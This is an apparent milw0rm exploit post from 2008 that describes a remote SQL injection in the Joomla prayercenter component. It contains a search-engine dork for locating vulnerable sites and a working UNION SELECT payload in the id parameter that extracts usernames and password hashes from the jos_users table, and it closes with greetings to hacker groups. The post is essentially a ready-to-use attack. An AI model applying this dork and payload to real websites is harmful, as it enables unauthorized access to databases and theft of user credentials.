22 lines
No EOL
1,007 B
Text
22 lines
No EOL
1,007 B
Text
/---------------------------------------------------------------\
|
|
\ /
|
|
/ Joomla Component prayercenter Remote SQL injection \
|
|
\ /
|
|
\---------------------------------------------------------------/
|
|
|
|
|
|
[*] Author : His0k4 [ALGERIAN HaCkEr]
|
|
|
|
[*] Dork : inurl:"com_prayercenter"
|
|
|
|
[*] POC : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}
|
|
|
|
[*] Example : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
|
|
|
|
[*] Note : Sometimes you need to register for doing this exploit
|
|
|
|
----------------------------------------------------------------------------
|
|
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
|
|
[*] Greetings2 : http://www.palcastle.org/cc
|
|
|
|
# milw0rm.com [2008-05-31] |